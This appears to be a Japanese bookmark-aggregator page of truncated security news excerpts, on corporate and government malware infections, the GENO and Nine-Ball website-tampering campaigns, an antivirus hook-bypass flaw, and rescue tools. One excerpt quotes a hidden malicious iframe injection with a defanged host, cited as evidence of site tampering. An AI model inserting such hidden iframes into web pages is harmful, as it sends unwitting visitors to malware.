電話番号はそのままで、月額基本料・通話料がおトクなIP電話サービスです。携帯電話や海外への通話料もぐっとおトクです。 対象光回線/「BB.excite光 Fit」「エキサイト光」「excite MEC光」をご利用中の方 基本プラン 550円(税込) 通話基本料 8.8円/3分(税込)
総合機械メーカー「三菱重工業」がサイバー攻撃を受けていた事件で、同社のコンピューターが少なくとも50種類以上のウイルスに感染していることが分かった。 1台で28種類のウイルスに感染した端末もあり、その中には既に7年前に危険性が指摘され、ウイルス対策ソフトを適切に使用していれば検知できたはずのウイルスもあった。防衛省は取引企業に対し、調達の基準の中で十分なセキュリティー対策を講じるよう求めており、今後、同社に情報管理態勢について報告を求める方針。 関係者によると、同社では現在、感染が発覚したサーバーやパソコン83台の解析を順次進めているが、これまで、同社が9月19日時点で発表した8種類を大幅に上回る50種類以上のウイルスが発見された。 また、作業用端末の1台は28種類のウイルスに感染。このうち、情報を抜き取るタイプのウイルス「アゴボット」は、2004年4月に危険性が見つかり、注意情報が出てい
はまもとさんのシリーズ。生々しいところが非常に参考になりますなあ。このシリーズはどれも力作というか、実体験ベースなので学べるところ多いですよね。 SPやパッチを適用できないパソコンのセキュリティを確保する | 日経 xTECH(クロステック) それにしても、ウイルス対策でベンダーさんがいろいろと工夫されているのはわかるんだけど、この閉塞感はなんでしょうね。最近のウイルスはあっしはiPhone化してると思うんだけど(=既存の技術を使いながら、合わせ技として非常に洗練されてきている)、そういうパッケージに対抗するには、レピュテーションだけでは弱いすよねえ。ホワイトリスト+ブラックリストも決定的ではないし。いや、本当はホワイトリストがかっちり確立できるのなら決定打になりえると思うんだけどね。 エミュレーションとかヒューリスティック系の解析がそれのみで決定打となり得るなら、現在のいろんな偽装工作に
アナライジング・マルウェア ―フリーツールを使った感染事案対処 (Art Of Reversing) 作者: 新井悠,岩村誠,川古谷裕平,青木一史,星澤裕二出版社/メーカー: オライリージャパン発売日: 2010/12/20メディア: 単行本(ソフトカバー)購入: 8人 クリック: 315回この商品を含むブログ (22件) を見るLACの新井さん、NTTの中の人岩村さん、川古谷さん、青木さん、星澤さんと、日本が誇るマルウェア解析の第一人者がここに集結。特に岩村さん、川古谷さん、青木さんの参加は大きい。KDDIの中尾康二さんなどから、Cyber Clean Centerの活動は漏れ聞いてましたが、こういう奥の院にいる人が出てくるのは良いことなのではないかと思います。まぁ、わたしが単に最近、セキュリティカンファレンスに参加できていないので、会えていなかっただけかもしれませんが・・・ 目次は以下
省庁へサイバー攻撃 実態判明 1月21日 19時32分 日本の中央省庁の奥深くに直接、サイバー攻撃が行われている実態が明らかになりました。去年11月、経済産業省の職員らにパソコン内部の情報を外部に流出させるウイルスが仕組まれたメールが届き、およそ20台のパソコンがウイルスに感染していました。 このコンピューターウイルスは、メールの添付ファイルなどに仕組まれ、ファイルを開くと、パソコン内部の情報を盗み出し、勝手に外部に流出させるもので、「バックドア」と呼ばれています。今回のメールは、実在する職員を装って送信され、その内容は去年11月、中国からの輸出が滞っていたレアアースの安定確保を巡る当時の大畠経済産業大臣とカザフスタンの下院議長との会談に関するものでした。メールは会談の直前に届き、添付ファイルの内容を確認するよう求める文面になっていたことなどから、およそ20人の職員がファイルを開き、ウイル
【2015.10.10 追記】 新しいの書きました。 無償ウイルススキャンLiveCD 私的まとめ version 2015 INDEX 【注意】LiveCDの利点・欠点 Norton ブータブルリカバリツール Dr.Web LiveCD F-Secure Rescue CD Kaspersky Rescue Disk 10 BitDefender RescueCD Avira AntiVir Rescue System AVG Rescue CD Windows PE 2.0 + eScan(MWAVSCAN) 【追記】ちょっと違うけどこんな方法も 【追記】USBメモリでブート 【追記】isoイメージからブート Norton以外はLinuxユーザ向けという気がしますが、一応試してみたレベル。(実際の感染PCでは実行してないです) WinPEのCDが作ってあって別マシンがあるなら、WinP
セキュリティテスト機関Matousecが、Windows上で動くほぼ全てのウィルス対策ソフトウェアに通じる脆弱性を発見したそうだ(The Register、本家/.)。 ウイルス対策ソフトは通常、Windows APIにフックを仕掛け、APIに渡されたパラメータをチェックして安全を確認してからそのAPIを実行する。しかし、パラメータはユーザー空間に格納されているため、パラメータのチェック後に値を書き換えることが可能という。これを利用し、まずは「安全」なパラメータをAPIに渡し、ウイルス対策ソフトによるチェックが完了して本来のAPIが実行される寸前でパラメータを書き換えることで、チェックをすり抜けて危険な処理を実行させることができるという。マルチコアシステムでは同時実行されているスレッドを把握できないことも多いため、より実行しやすいとのこと。 調査レポートによるとこの方法は「権限を制限したW
<IFRAME name="StatPage" src="http://iner●kz/index2.php" width=5 height=5 style="display:none"> もう検索しようがないですねぇ……同様の改竄と思われるのが Bingのキャッシュ(見るときはブラウザのJavaScriptを切ってから) http://cc.bingj.com/cache.aspx?q=script+code1+try&d=4586565574853043&mkt=ja-JP&setlang=ja-JP&w=415a73d1,318f0160 で見られます。 他にも www.fitweb.or●jp/~yujima/ (Firefox3以降だと夕方ブロックされるようになりました) Bingのキャッシュ(見るときはブラウザのJavaScriptを切ってから) http://cc.bingj
アップデート情報 リリースノート ( excite翻訳 ) COMODO公式フォーラム ( excite翻訳 ) 2010-05-07 主要な総合セキュリティソフトを評価する Proactive Security Challenge が更新された。テスト項目が 更新され ランキングが混乱していたが、CISはなお100%のスコアを維持している。 2010-04-13 COMODO Internet Security 4.0.141842.828がリリースされた。アップデートはCIS4ユーザーに通知される。このリリースには不完全な翻訳と思われる言語が搭載されておらず、それにより日本語も搭載されていない。以前からのアップデートの場合はそのまま日本語表示が利用できる。( 以前の日本語言語ファイル ) 2010-03-25 COMODO Internet Security 4.0.138377.77
文:Dancho Danchev(Special to ZDNet.com) 翻訳校正:石橋啓一郎 2009-07-21 16:48 2009年7月、Symantecの製品マネージャーDavid Hall氏は無償のセキュリティソフトウェアは有償バージョンの代わりにはならないと退けるとともに、Microsoftの無償の「Microsoft Security Essentials」について、「Microsoftが小売店から引き上げた製品OneCareの必要最小限の機能を残したものだ」と表現した。 競合企業からのこのような発言は、対抗馬となるソリューションに対する直接的な攻撃として行われることが多いことはもちろんだが、これらの発言が無償のアンチウイルスソフトウェアが安全性に対するあやまった感覚を与えるかどうかという議論に火を注いだことも事実だ。 答えはどちらなのだろうか。データとほんの少しの常識
トロイの木馬脆弱性改ざん 米国のセキュリティ対策企業ウェブセンス社は、6月はじめに確認されたWeb改ざん攻撃についてブログ上で解説しました。同社が「Nine-Ball(ナインボール)」と名づけた攻撃は、改ざんされた正規のWebサイトを経由して、サイトを閲覧したユーザーにマルウェアを感染させるということです。複数のリダイレクトを繰り返し最終的な攻撃サイトに誘導するのが特徴で、「ninetoraq.in」が最終的な攻撃サイトになっていたことから、「Nine-Ball(ナインボール)」と名づけられました。 ・Webウィルス「Nine-Ball」が依然猛威、3万サイト以上で確認(ITPro) 記事によると、Nine-Ballの攻撃の概要は以下の通りです。 (1)攻撃者はシステムに侵入し、正規のWebサイトのページを改ざん (2)改ざんされたWebページには悪意あるJavaScriptが埋め込まれ
T-110.6220 Special Course in Communications Security Spring 2008: Malware Analysis and Antivirus Technologies (5 ECTS) P V Opinnot > T-110.6220 > index.html Announcements 29.4.2008 Please give us course feedback: Finnish form, English form or Swedish form. 18.4.2008 Extra homework is published. 10.4.2008 Instructions for the course project are published. Check also material from the last lecture.
会員限定サービスです 月額プランが10月末まで無料 お申し込み 会員の方はこちら ログイン 日経クロステック TOPページ
セキュアブレインは2009年6月12日,国内で400以上のWebサイトが「GENOウイルス(通称)」によって改ざんされているという調査結果を発表した。改ざん被害を受けたWebサイトのうち,約45%が「co.jp」ドメインを持つ企業サイトだという。また,「go.jp」ドメインの政府機関サイト,「ac.jp」ドメインの教育機関サイトの被害も確認された。 「GENOウイルス」は,Webサイト管理者のPCに感染して,FTP接続用のパスワードを盗む。攻撃者は,盗んだパスワードを使って,悪意のあるJavaスクリプトをWebサイトに埋め込み,閲覧者を自動的に「GENOウイルス」配布サイトへ誘導する。そのため,閲覧者が「GENOウイルス」に感染して,別のWebサイトが改ざんされるという被害連鎖が発生している。 同社は,「ぜい弱性などの問題がない企業サイトでも,『GENOウイルス』による改ざんの被害を受けて
2009年4月9日,NTTコミュニケーションズ(NTTコム)の「Arcstar IP-VPN」を監視するシステムがウイルスに感染していたことが明らかになった。感染範囲はNTTコムの内部にとどまらず,Arcstar IP-VPNを利用する企業のパソコンまで被害が拡大した。NTTコムのシステム運用の甘さが露呈した格好だ。 Arcstar IP-VPNには,ユーザー企業のルーターを監視する「ルーター監視オプション・サービス」がある。ウイルスに最初に感染したのは,同サービス向けの監視端末である(図1)。 NTTコムが監視端末の感染を知ったのは,2009年4月9日の午前中。Arcstar IP-VPNのユーザー企業から「NTTコム側から不正なパケットが断続的に届いている」との報告があった。この申告に基づきシステムを調査したところ,監視端末のウイルス感染が見付かった。同日13時ごろに全監視端末をネット
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く